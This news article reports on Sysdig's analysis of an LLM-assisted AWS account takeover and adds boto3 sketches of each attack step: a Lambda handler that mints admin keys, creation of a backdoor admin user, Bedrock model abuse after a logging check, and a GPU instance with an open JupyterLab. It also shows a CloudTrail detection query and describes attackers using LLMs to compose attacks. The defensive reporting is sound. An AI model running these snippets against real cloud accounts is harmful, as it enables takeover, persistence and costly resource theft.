
Attackers exploit LLMs to gain admin rights in AWS

Security researchers at Sysdig warn that attackers can quickly take over AWS environments using large language models. Their latest analysis shows that AI is already being used to automate cloud attacks, accelerate them, and make them harder to detect.

The Sysdig Threat Research Team bases these conclusions on an attack that began on November 28, 2025. In this case, an attacker gained initial access and escalated to full administrator rights within an AWS account in less than ten minutes. The researchers reconstructed the entire attack chain and linked it to concrete detection and mitigation guidance for organizations seeking to better protect their cloud environments.

The attack began with credentials left in publicly accessible S3 buckets. These buckets contained RAG data for AI models and were linked to an IAM user whose Lambda permissions were broad enough to be abused. The attacker used those rights to modify the code of an existing Lambda function; the new code generated access keys for an admin user and returned them directly in the Lambda response.
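To illustrate the pattern, the following is a minimal sketch of what such a modified Lambda handler could look like, assuming Python and boto3; the user name and response format are illustrative and not taken from the report.

```python
import json
import boto3

iam = boto3.client("iam")

def lambda_handler(event, context):
    # Mint a fresh access key for an existing administrator user
    # ("admin-user" is a hypothetical name) and return the credentials
    # directly in the invocation response, so whoever invokes the function
    # can read them straight from the Lambda output.
    resp = iam.create_access_key(UserName="admin-user")
    key = resp["AccessKey"]
    return {
        "statusCode": 200,
        "body": json.dumps({
            "AccessKeyId": key["AccessKeyId"],
            "SecretAccessKey": key["SecretAccessKey"],
        }),
    }
```

A handler like this only works because the function's execution role is allowed to call iam:CreateAccessKey, which is exactly the kind of over-broad permission described in the next paragraph.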

According to Sysdig, the structure of the malicious code, including Serbian comment lines and extensive error handling, strongly suggests the use of an LLM. Because the Lambda function ran under a highly permissive execution role, the attacker could obtain administrative privileges indirectly, without resorting to traditional privilege escalation via IAM roles.

Attacker spreads access across a large number of principals

The attacker then moved laterally through the account. A total of nineteen different AWS principals were used, including existing IAM users for whom new access keys were created. A new admin user was also created to make the access persistent. Notably, the attacker attempted to assume roles in accounts that did not belong to the organization, which, according to the researchers, is consistent with patterns seen in AI-generated actions.
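A hedged sketch of these persistence steps, again assuming boto3; all user names are placeholders rather than details from the incident.

```python
import boto3

iam = boto3.client("iam")

# Issue additional access keys for IAM users that already exist in the account.
for existing_user in ("app-user-1", "app-user-2"):
    iam.create_access_key(UserName=existing_user)

# Create a brand-new user, attach the AWS-managed AdministratorAccess policy,
# and give it its own access key so the foothold survives credential rotation.
iam.create_user(UserName="backup-admin")
iam.attach_user_policy(
    UserName="backup-admin",
    PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",
)
iam.create_access_key(UserName="backup-admin")
```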

Attention then shifted to Amazon Bedrock. The attacker first checked whether model invocation logging was active, then invoked multiple AI models. This matches an attack technique Sysdig has previously described as LLMjacking, in which cloud-hosted models are abused for the attacker's own gain. The attacker even uploaded a Terraform script capable of deploying a public Lambda backdoor to generate Bedrock credentials.
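The Bedrock steps can be approximated as follows; this is a sketch using boto3, with the region, model ID, and prompt chosen for illustration rather than taken from the incident.

```python
import json
import boto3

# Check whether model invocation logging is enabled before touching any models.
bedrock = boto3.client("bedrock", region_name="us-east-1")
logging_config = bedrock.get_model_invocation_logging_configuration()
print(logging_config.get("loggingConfig"))

# Invoke a foundation model on the victim's account (LLMjacking).
runtime = boto3.client("bedrock-runtime", region_name="us-east-1")
response = runtime.invoke_model(
    modelId="anthropic.claude-3-sonnet-20240229-v1:0",
    body=json.dumps({
        "anthropic_version": "bedrock-2023-05-31",
        "max_tokens": 256,
        "messages": [{"role": "user", "content": "Hello"}],
    }),
)
print(json.loads(response["body"].read()))
```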

Later, the attacker attempted to launch large GPU instances for machine learning workloads. Ultimately, a costly p4d instance was launched with a publicly accessible JupyterLab server as an alternative entry point. The installation script referenced a non-existent GitHub repository, again indicating that a language model was used to compose the attack.
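A sketch of what launching such an instance could look like with boto3; the AMI ID and the JupyterLab setup are placeholders, and the actual installation script used by the attacker is not reproduced here.

```python
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# User data that installs JupyterLab and exposes it publicly without authentication,
# giving the attacker an alternative entry point into the environment.
user_data = """#!/bin/bash
pip install jupyterlab
jupyter lab --ip=0.0.0.0 --port=8888 --no-browser --allow-root \
  --ServerApp.token='' --ServerApp.password='' &
"""

ec2.run_instances(
    ImageId="ami-0123456789abcdef0",  # placeholder AMI ID
    InstanceType="p4d.24xlarge",      # the costly GPU instance family named in the report
    MinCount=1,
    MaxCount=1,
    UserData=user_data,
)
```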

According to Sysdig, this case shows how the threat landscape is changing. Attackers no longer need in-depth knowledge of an environment when a language model can generate scripts, perform reconnaissance, and make real-time decisions. The report emphasizes that organizations must pay close attention to unusual model calls, massive resource enumeration, and the abuse of Lambda permissions.
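As a starting point for the Lambda-related detection advice, the sketch below queries CloudTrail via boto3 and flags access keys created by a Lambda execution role; the 24-hour window and the role-name heuristic are assumptions, not Sysdig's detection rules.

```python
import json
from datetime import datetime, timedelta, timezone

import boto3

cloudtrail = boto3.client("cloudtrail")
start = datetime.now(timezone.utc) - timedelta(hours=24)

# Pull recent CreateAccessKey events from CloudTrail.
resp = cloudtrail.lookup_events(
    LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": "CreateAccessKey"}],
    StartTime=start,
)

for event in resp["Events"]:
    record = json.loads(event["CloudTrailEvent"])
    caller_arn = record.get("userIdentity", {}).get("arn", "")
    # An access key minted from an assumed Lambda execution role matches the
    # pattern described in the report; the substring check is a rough heuristic.
    if ":assumed-role/" in caller_arn and "lambda" in caller_arn.lower():
        print("Suspicious CreateAccessKey by", caller_arn, "at", event["EventTime"])
```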

The researchers conclude that AI is not only a tool for defenders, but has also become a powerful weapon in the hands of attackers.